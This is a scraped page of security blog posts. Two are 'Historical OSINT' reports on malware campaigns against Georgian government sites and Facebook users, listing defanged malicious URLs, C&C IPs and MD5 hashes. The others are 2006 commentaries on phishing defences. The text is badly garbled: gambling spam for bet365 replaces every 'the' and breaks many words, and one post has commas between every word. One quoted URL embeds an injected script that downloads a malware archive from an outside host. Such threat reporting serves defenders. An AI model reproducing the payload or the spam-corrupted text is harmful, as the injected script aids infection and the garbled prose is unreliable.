Showing posts with label Phishing. Show all posts
Showing posts with label Phishing. Show all posts

Wednesday, September 11, 2019

Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Kneber Botnet

It's 2010 and I've recently came across to a compromised Georgian Government Ministry of Defense and Ministry of Justice official Web site spreading potentially participating in a wide-spread phishing and malware-serving campaign enticing users into interacting with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rogue U.S Intelligence and U.S Law Enforcement cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365med emails for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 purpose of spreading and dropping malicious software on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 targeted host's PC.


Sample malicious URL known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign abusing common Web Site redirection application vulnerability flaw:
hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121

Related malicious URLs known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 config:
hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
hxxp://new.justice.gov.ge/files/Headers/in.txt
hxxp://new.justice.gov.ge/files/Headers/fresh.txt
hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
MD5: d0c0a2e6b30f451f69df9e2514ba36f2
MD5: 974a4a516260a4fafb36234897469013
MD5: ecb7304f838efb8e30a21189458b8544
MD5: 81b3bff487fc9a02e10288114fc2b5be
MD5: 234523904033f8dc692c743cbcf5cf2b
MD5: e2fffaffc1064d24e7ea6bab90fd86fc
MD5: 5941c9b5bd567c5baaecc415e453b5c8
MD5: 0ff325365f1d8395322d1ef0525f3b1f
MD5: 4437617b7095ed412f3c663d4b878c30
MD5: eb66a3e11690069b28c38cea926b61d2
MD5: 2b7e4b7c5faf45ebe48df580b63c376b

Known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign are also cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following two domains part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Hilary Kneber botnet:
hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip
hxxp://rapidshare.com/files/318309046/CYBERCAFE.zip.html
hxxp://www.sendspace.com/file/fmbt01
hxxp://hkcaregroup.com/modlogan/MILSOFT.zip
hxxp://rapidshare.com/files/320369638/MILSOFT.zip.html
hxxp://fcpra.org/downloads/MILSOFT.zip
hxxp://fcpra.org/downloads/winupdate.zip
hxxp://www.sendspace.com/file/tj373l
hxxp://mv.net.md/update/update.zip - 195.22.225.5
hxxp://www.sendspace.com/file/7jmxtq
hxxp://mv.net.md/dsb/DSB.zip
hxxp://www.sendspace.com/file/rdxgzd
hxxp://timingsolution.com/Doc/BULLETIN.zip
hxxp://www.sendspace.com/file/goz3yd
hxxp://dnicenter.com/docs/report.zip
hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 222.122.60.1
hxxp://www.sendspace.com/file/h96uh1
hxxp://depositfiles.com/files/xj1wvamc4
hxxp://tiesiog.puikiai.lt/report.zip
hxxp://somashop.lv/report.zip
hxxp://www.christianrantsen.dk/report.zip
hxxp://enigmazones.eu/report.zip
hxxp://www.christianrantsen.dk/report.zip
hxxp://enigmazones.eu/report.zip

hxxp://gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN.zip
hxxp://quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.zip - 66.147.242.169

Related malicious and fraudulent domains known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
hxxp://dhsinfo.info - 218.240.28.34
hxxp://greylogic.info - 218.240.28.34; 218.240.28.4
hxxp://intelfusion.info - 218.240.28.34

hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign:
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed a sample malware phones back to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following C&C server IPs:
hxxp://from-us-with-love.info - 91.216.141.171
hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin
hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Hilary Kneber botnet campaign:
hxxp://58.218.199.239
hxxp://59.53.91.102
hxxp://60.12.117.147
hxxp://61.235.117.71
hxxp://61.235.117.86
hxxp://61.4.82.216
hxxp://193.104.110.88
hxxp://95.169.186.103
hxxp://222.122.60.186
hxxp://217.23.10.19
hxxp://85.17.144.78
hxxp://200.106.149.171
hxxp://200.63.44.192
hxxp://200.63.46.134
hxxp://91.206.231.189
hxxp://124.109.3.135
hxxp://61.61.20.134
hxxp://91.206.201.14
hxxp://91.206.201.222
hxxp://91.206.201.8
hxxp://216.104.40.218
hxxp://69.197.128.203

Related malicious and fraudulent domains known to have participated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Hilary Kneber botnet campaign:
hxxp://123.30d5546ce2d9ab37.d99q.cn
hxxp://d99q.cn
hxxp://524ay.cn
hxxp://adcounters.net
hxxp://adobe-config-s3.net
hxxp://mywarworld.cn
hxxp://aqaqaqaq.com
hxxp://avchecker123.com
hxxp://bizelitt.com
hxxp://biznessnews.cn
hxxp://bizuklux.cn
hxxp://fcrazy.com
hxxp://fcrazy.eu
hxxp://boolred.in
hxxp://brans.pl
hxxp://britishsupport.net
hxxp://bulkbin.cn
hxxp://chaujoi.cn
hxxp://checkvirus.net
hxxp://chinaoilfactory.cn
hxxp://chris25project.cn
hxxp://client158.faster-hosting.com
hxxp://cwbnewsonline.cn
hxxp://cxzczxccc.com.cn
hxxp://dasfkjsdsfg.biz
hxxp://dia2.cn
hxxp://digitalinspiration.e37z.cn
hxxp://dolbanov.net
hxxp://dolcegabbana.djbormand.cn
hxxp://djbormand.cn
hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98
hxxp://sttcounter.cn
hxxp://dred3.cn
hxxp://dsfad.in
hxxp://e37z.cn
hxxp://e58z.cn
hxxp://electrofunny.cn
hxxp://electromusicnow.cn
hxxp://elsemon.cn
hxxp://fcrazy.info
hxxp://filemarket.net
hxxp://flo5.cn
hxxp://footballcappers.biz
hxxp://fobsl.cn
hxxp://forum.d99q.cn
hxxp://gamno6.cn
hxxp://gidrasil.cn
hxxp://gifts2010.net
hxxp://ginmap.cn
hxxp://giopnon.cn
hxxp://gksdh.cn
hxxp://glousc.com
hxxp://gnfdt.cn
hxxp://gold-smerch.cn
hxxp://goldenmac.cn
hxxp://google.maniyakat.cn
hxxp://maniyakat.cn
hxxp://greenpl.com
hxxp://grizzli-counter.com
hxxp://grobin1.cn
hxxp://inpanel.cn
hxxp://itmasterz.org
hxxp://iuylqb.cn
hxxp://kaizerr.org
hxxp://keepmeupdated.cn
hxxp://khalej.cn
hxxp://kimosimotuma.cn
hxxp://klaikius.com
hxxp://klitar.cn
hxxp://kolordat482.com
hxxp://kotopes.cn
hxxp://liagand.cn
hxxp://love2coffee.cn
hxxp://majorsoftwareupdate.info
hxxp://marcusmed.com
hxxp://mcount.net
hxxp://mega-counter.com
hxxp://monstersoftware.info
hxxp://morsayniketamere.cn
hxxp://mydailymail.cn
hxxp://mynewworldorder.cn
hxxp://newsdownloads.cn
hxxp://nit99.biz
hxxp://nm.fcrazy.com
hxxp://nmalodbp.com
hxxp://not99.biz
hxxp://online-counter.cn
hxxp://pedersii.net
hxxp://piramidsoftware.info
hxxp://popupserf.cn
hxxp://qaqaqaqa.com
hxxp://qaqaqaqa.net
hxxp://qbxq16.com
hxxp://redlinecompany.ravelotti.cn
hxxp://ravelotti.cn
hxxp://relevant-information.cn

Related Hilary Kneber botnet posts:
Keeping Money Mule Recruiters on a Short Leash
Standardizing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Money Mule Recruitment Process
Dissecting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Exploits/Scareware Serving Twitter Spam Campaign
Koobface Botnet Starts Serving Client-Side Exploits

Friday, December 23, 2016

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Wild

In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercrimianals, continue, actively, populating, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir, botnet's, infected, population, with, hundreds, of, thousands, of, newly, affected, users, globally, potentially, compromising, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, confidentiality, integrity, and, availability, of, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, affected, hosts, to, a, multi-tude, of, malicious, software, furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, earning, fraudulent, revenue, in, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, process, of, monetizing, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, affected, botnet's, population, largely, relying, on, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, utilization, of, affiliate-based, type, of, fraudulent, revenue, monetization, scheme.

We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, impersonating, Facebook, for, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, purpose, of, serving, client-side, exploits, to, socially, engineered, users, furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, compromising, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, confidentiality, integrity, and, availability, of, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, affected, hosts, to, a, multi-tude, of, malicious, software, furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, earning, fraudulent, revenue, in, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, process, of, monetizing, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, affected, hosts, largely, relying, on, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, use, of, affiliate-based, type, of, fraudulent, revenue, monetizing, scheme.

In, this, post, we'll, profile, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, campaign, provide, actionable, intelligence, on, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, infrastructure, behind it, discuss, in-depth, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, tactics, techniques, and, procedures, of, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, cybercriminals, behind, it, and, provide, actionable, intelligence, on, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, infrastructure, behind, it.

Sample, URL, exploitation, chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related, malicious, domains, known, to, have, participated, in, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample, detection, rate, for, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, malicious, executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once, executed, a, sample, malware, phones back to:
hxxp://makotoro.com

Related, malicious, C&C, server, IPs, known, to, have, participated, in, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, campaign:
hxxp://91.201.196.99
hxxp://91.201.196.77
hxxp://91.201.196.101
hxxp://91.201.196.35
hxxp://91.201.196.75
hxxp://91.201.196.76
hxxp://91.201.196.38
hxxp://91.201.196.34
hxxp://91.201.196.37

Related, malicious, C&C, server, IPs (212.175.173.88), known, to, have, participated, in, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, campaign:
hxxp://downloads.fileserversa.org
hxxp://downloads.fileserversc.org
hxxp://downloads.fileserversd.org
hxxp://downloads.portodrive.org
hxxp://downloads.fileserversj.org
hxxp://downloads.fileserversk.org
hxxp://downloads.fileserversm.org
hxxp://downloads.fileserversn.org
hxxp://downloads.fileserverso.org
hxxp://downloads.fileserversq.org
hxxp://downloads.fileserversr.org
hxxp://auth.facebook.com.megavids.org
hxxp://auth.facebook.com.fileserversl.com
hxxp://auth.facebook.com.legomay.com
hxxp://auth.facebook.com.crymyway.com
hxxp://auth.facebook.com.portodrive.net
hxxp://auth.facebook.com.modavedis.net
hxxp://auth.facebook.com.migpix.net
hxxp://auth.facebook.com.legomay.net
hxxp://auth.facebook.com.crymyway.net
hxxp://downloads.megavids.org
hxxp://downloads.regzavids.org
hxxp://downloads.vedivids.org
hxxp://downloads.restpictures.org
hxxp://downloads.modavedis.org
hxxp://downloads.fileserverst.org
hxxp://downloads.fileserversu.org
hxxp://downloads.regzapix.org
hxxp://downloads.reggiepix.org
hxxp://downloads.migpix.org
hxxp://downloads.restopix.org
hxxp://downloads.legomay.org
hxxp://downloads.vediway.org
hxxp://downloads.compoway.org
hxxp://downloads.restway.org
hxxp://downloads.crymyway.org
hxxp://downloads.fileserversa.com
hxxp://downloads.fileserversb.com
hxxp://downloads.fileserversc.com
hxxp://downloads.fileserversd.com
hxxp://downloads.fileserverse.com
hxxp://downloads.fileserversf.com
hxxp://downloads.fileserversg.com
hxxp://downloads.fileserversh.com
hxxp://downloads.fileserversi.com
hxxp://downloads.fileserversj.com
hxxp://downloads.fileserversk.com
hxxp://downloads.fileserversl.com
hxxp://downloads.fileserversm.com
hxxp://downloads.fileserversn.com
hxxp://downloads.fileserverso.com
hxxp://downloads.fileserversp.com
hxxp://downloads.fileserversq.com
hxxp://downloads.fileserversr.com
hxxp://downloads.regzavids.com
hxxp://downloads.vedivids.com
hxxp://downloads.restpictures.com
hxxp://downloads.modavedis.com
hxxp://downloads.fileserverss.com
hxxp://downloads.fileserverst.com
hxxp://downloads.fileserversu.com
hxxp://downloads.regzapix.com
hxxp://downloads.reggiepix.com
hxxp://downloads.migpix.com
hxxp://downloads.legomay.com
hxxp://downloads.vediway.com
hxxp://downloads.compoway.com
hxxp://downloads.crymyway.com
hxxp://downloads.fileserversa.net
hxxp://downloads.fileserversb.net
hxxp://downloads.fileserversc.net
hxxp://downloads.fileserversd.net
hxxp://downloads.fileserverse.net
hxxp://downloads.portodrive.net
hxxp://downloads.fileserversf.net
hxxp://downloads.fileserversg.net
hxxp://downloads.fileserversh.net
hxxp://downloads.fileserversi.net
hxxp://downloads.fileserversj.net
hxxp://downloads.fileserversk.net
hxxp://downloads.fileserversl.net
hxxp://downloads.fileserversm.net
hxxp://downloads.fileserversn.net
hxxp://downloads.fileserverso.net
hxxp://downloads.fileserversp.net
hxxp://downloads.fileserversq.net
hxxp://downloads.fileserversr.net
hxxp://downloads.regzavids.net
hxxp://downloads.vedivids.net
hxxp://downloads.tastyfiles.net
hxxp://downloads.restpictures.net
hxxp://downloads.modavedis.net
hxxp://downloads.fileserverss.net
hxxp://downloads.fileserverst.net
hxxp://downloads.fileserversu.net
hxxp://downloads.regzapix.net
hxxp://downloads.reggiepix.net
hxxp://downloads.migpix.net
hxxp://downloads.legomay.net
hxxp://downloads.vediway.net
hxxp://downloads.compoway.net
hxxp://downloads.restway.net
hxxp://downloads.crymyway.net

We'll, continue, monitoring, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365, campaign, and, post, updates, as, soon, as, new, developments, take, place.

Friday, April 14, 2006

Fighting Internet's email junk through licensing

Just came across this story at Slashdot, interesting approach :



"China has introduced regulations that make it illegal to run an email server without a licence. The new rules, which came into force two weeks ago, mean that most companies running cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir own email servers in China are now breaking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 law. The new email licensing clause is just a small part of a new anti-spam law formulated by China's Ministry of Information Industry (MII)."



While cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 commitment is a remarkable event given China's booming Internet population -- among cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 main reasons Google had to somehow enter China's search market and take market share from Baidu.com -- you don't need a mail server to disseminate spam and phishing attacks like it used to be in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 old days. You need botnets, namely, going through CME's List, you would see how cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 majority of today's malware is loaded with build-in SMTP engine, even offline/in-transit/web email harvesting modules.



You can often find China on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 top of every recently released spam/phishing/botnet trends summary, which doesn't mean Chinese Internet users are insecure -- just unaware. What you can do is educate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 masses to secure cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entire population, and stimulate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 growth of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local security market that everyone is so desperately trying to tap into.


Moreover, I doubt you can regulate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 type of Internet users still trying to freely access information, again with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wrong attitude in respect to security :



"..prohibiting use of email to discuss certain vaguely defined subjects related to 'network security' and ' information security', and also reiterate that emails which contain content contrary to existing laws must not be copied or forwarded. Wide-ranging laws of this nature have been used against political and religous dissenters in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 past."



It's like legally justifying cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 country's censorship practices through introducing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 law, whereas I feel "network security" and "information security" attacks outside cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 homeland get favored, compared to internal ones, don't you?



Forbidden fruits turn into dangerous desires on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 majority of occasions, and you just can't control that, what's left to censor it.



Technorati tags:
, , , ,

Wednesday, April 05, 2006

Heading in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opposite direction

Just one day before April 1st 2006 I came across this article :



"German retail banker Postbank will begin using electronic signatures on e-mails to its customers to help protect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m from phishing attacks."



Catching up with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 phishers seems to be a very worrisome future strategy. Electronic Signatures by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves are rarely checked by anyone, and many more attack vectors are making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 idea of this totally irrelevant. Moreover, a great research "Why phishing works" was recently released and it basically outlines basic facts such as how end users doesn't pay attention to security checks, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's a definition of such given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attack vectors phishers have started using recently. In some of my previous posts "Security threats to consider when doing E-Banking", and "Anti Phishing toolbars - can you trust cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m?" I mentioned many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r problems related to this bigger than it seems problem, what you should also keep an eye on is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 good old ATM scam I hope you are aware of.



Postbank is often targeted by phishers, still, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best protection is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 level of security awareness stated in here :



"Phishing attacks have led 80% of Germans to distrust banking related e-mails, according to TNS Infratest." Moreover, "Postbank's electronic signature service isn't possible with web-based e-mail services provided by local Internet service providers such as GMX GmbH and Freenet.de AG, according to Ebert. One exception is Web.de"



Thankfully, but that's when you are going in exactly cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opposite direction than your customers are, while trying to estalibish reputable bank2customer relationship over email. Listen your customers first, and follow cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trends, and do not try to use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most popular dissemination vector as a future communication one.



Something else in respect to recent phishing statistics is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key summary points of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recently released, AntiPhishingGroup's Report for January, 2006 report :



• Number of unique phishing reports received in January: 17,877
• Number of unique phishing sites received in January: 9715
• Number of brands hijacked by phishing campaigns in January: 101
• Number of brands comprising cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 top 80% of phishing campaigns in January: 6
• Country hosting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most phishing websites in January: United States
• Contain some form of target name in URL: 45 %
• No hostname just IP address: 30 %
• Percentage of sites not using port 80: 8 %
• Average time online for site: 5.0 days
• Longest time online for site: 31 days




I feel cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's a lot more to expect than trying to re-establish cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 communication over a broken channel, as far as E-banking is concerned.



More resources you might be interested in taking a look at are :
Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks
Netcraft: More than 450 Phishing Attacks Used SSL in 2005
SSL's Credibility as Phishing Defense Is Tested
Rootkit Pharming
The future of Phishing
Something is Phishy here...
Phishing Site Using Valid SSL Certificates
Thoughts on Using SSL/TLS Certificates as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Solution to Phishing



Technotati tags:
, , ,

Monday, March 06, 2006

Anti Phishing toolbars - can you trust cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m?

A lot of recent phishing events occured, and what should be mentioned is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir constant ambitions towards increasing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of trust points between end users and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mirror version of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original site. The use of SSL and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ease of obtaining a valid certificate for to-be fraudelent domain is a faily simple practice. Phishing is so much more than this, and it even has to do with buying 0day vulnerabilities to keep itself competitive.


How should phishing be fought? Educating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end user not to trust that he/she's on Amazon.com, when he just typed it, or enforcing a technological solution to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem of digital social engineering and trust building? As far as trends are concerned, according to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 AntiPhishingGroup's latest report :



• Number of unique phishing reports received in December: 15244
• Number of unique phishing sites received in December: 7197
• Number of brands hijacked by phishing campaigns in December: 121
• Number of brands comprising cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 top 80% of phishing campaigns in December: 7
• Country hosting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most phishing websites in December: United States
• Contain some form of target name in URL: 51 %
• No hostname just IP address: 32 %
• Percentage of sites not using port 80: 7 %
• Average time online for site: 5.3 days
• Longest time online for site: 31 days



In case you haven't came across to this research "Do Security Toolbars Actually Prevent Phishing Attacks?" you'll find that it has very good points and actual evidence. Antiphishing filters and toolbars protection are gaining popularity, and many popular companies are fighting for market share of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end users'


desktop, but keep in mind that :



"We conducted two user studies of three security toolbars and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r browser security indicators and found cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m all ineffective at preventing phishing attacks. Even though subjects were asked to pay attention to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 toolbar, many failed to look at it; ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs disregarded or explained away cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 toolbars’ warnings if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 content of web pages looked legitimate. We found that many subjects do not understand phishing attacks or realize how sophisticated such attacks can be."



The topic of phishing and fighting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem has been again greatly extended by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 researcher Min Xu, while writing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365sis "Fighting Phishing at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 User Interface" and introducing a solution that measures a site's reputation and trustfulness. While, this is among cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 simplest ways Google uses to while assigning PageRank's, I find this a common sense warning. Still, with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 constant flood of Web 2.0 companies, does it matter? :) Check out some screenshots from this outstanding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365sis, and get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 point :


Localizing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacks, taking advantage of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 momentum, or a software vulnerability within a popular browser or site itself, as well as taking advantage of malware, are among cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most common practices cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se days. Moreover, I feel that fighting phishing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wrong way could erode cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end user's trust in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r hand, so do your homework on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 social impact on anything you do. NetCraft's Anti Phishing toolbar, whatsoever, is my favorite combination of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m all, still, awareness and lack of naivety when it comes to transactions or aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ntication is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 perfect tool, what about yours?



Some resources worth mentioning are :

Candid's “Phishing in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 middle of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stream” Today’s threats to online banking
Know your Enemy : Phishing
Phishing attacks and countermeasures
The Phishing Guide
Distributed Phishing Attacks
Phishiest Countries
MailFrontier Phishing IQ Test
Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures



Technorati tags :
, , ,